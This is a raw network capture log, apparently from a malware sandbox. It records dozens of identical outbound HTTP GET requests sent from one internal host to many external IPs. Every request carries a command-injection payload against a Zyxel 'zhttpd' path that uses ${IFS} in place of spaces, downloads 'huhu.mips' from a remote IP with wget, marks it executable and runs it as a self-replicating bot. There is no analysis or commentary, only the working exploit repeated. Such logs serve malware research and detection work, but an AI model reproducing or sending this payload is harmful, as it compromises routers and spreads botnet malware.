                                              Jan 29, 2024 07:04:01.235951900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7217192.168.2.1442154200.121.183.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235968113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7218192.168.2.145735425.112.183.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.235996008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7219192.168.2.1444098108.200.129.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236051083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7220192.168.2.144592883.225.215.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236088037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7221192.168.2.143849269.89.140.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236124992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7222192.168.2.1449542185.98.12.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236143112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7223192.168.2.143815667.231.238.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236191988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7224192.168.2.1457212222.11.49.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236216068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7225192.168.2.1445600222.46.42.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236248970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7226192.168.2.143667491.58.202.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236304998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7227192.168.2.1460296123.144.156.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236330986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7228192.168.2.144120290.245.103.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236361980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7229192.168.2.1446636118.237.125.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236388922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7230192.168.2.146083039.134.142.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236440897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7231192.168.2.145689094.122.142.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236479044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7232192.168.2.1441392187.145.152.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236510992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7233192.168.2.1439190109.139.100.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236551046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7234192.168.2.144885092.249.26.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236598015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7235192.168.2.144938662.181.88.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236617088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7236192.168.2.144319048.67.85.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236666918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7237192.168.2.1460048191.179.191.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236687899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7238192.168.2.144868266.77.235.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236716032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7239192.168.2.1435588120.96.78.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236757994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7240192.168.2.1455246123.82.94.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236803055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7241192.168.2.1441908144.221.69.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236826897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7242192.168.2.145445061.134.240.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236861944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7243192.168.2.1434682148.157.62.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236911058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7244192.168.2.144500846.44.243.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.236968994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7245192.168.2.14540609.154.131.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237001896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7246192.168.2.1457138148.158.137.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237055063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7247192.168.2.1439966174.187.111.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237083912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7248192.168.2.1445004207.177.234.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237133980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7249192.168.2.143634275.192.253.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237166882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7250192.168.2.1434858185.239.182.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237195015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7251192.168.2.1439766153.105.0.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237226009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7252192.168.2.144000854.106.128.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237286091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7253192.168.2.1458804167.53.191.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237329960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7254192.168.2.145624414.33.143.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237356901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7255192.168.2.1440468134.70.171.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237406015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7256192.168.2.145144689.32.248.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237433910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7257192.168.2.1441694135.102.64.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237452984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7258192.168.2.1440196145.98.158.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237477064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7259192.168.2.1453616184.148.13.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237521887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7260192.168.2.1449278178.152.35.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237576962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7261192.168.2.1451262216.61.92.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237621069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7262192.168.2.143462884.80.153.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237660885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7263192.168.2.144070465.150.124.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237714052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7264192.168.2.1455926106.86.56.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237752914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7265192.168.2.143787865.107.225.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237775087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7266192.168.2.1457384208.3.207.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237818956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7267192.168.2.143985872.179.138.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237853050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7268192.168.2.144341661.21.65.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237899065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7269192.168.2.1449326186.11.83.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237916946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7270192.168.2.1437542221.134.119.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237962008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7271192.168.2.1454748123.34.59.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.237986088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7272192.168.2.145013212.46.206.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238015890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7273192.168.2.1453570174.4.60.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238054037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7274192.168.2.1451980122.161.184.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238091946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7275192.168.2.145573098.43.43.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238117933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7276192.168.2.144771227.147.66.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238137007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7277192.168.2.143819844.32.245.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238173008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7278192.168.2.1439374120.87.200.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238193035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7279192.168.2.145802675.199.2.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238229036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7280192.168.2.1435000172.197.114.233443
                                              TimestampBytes transferredDirectionData
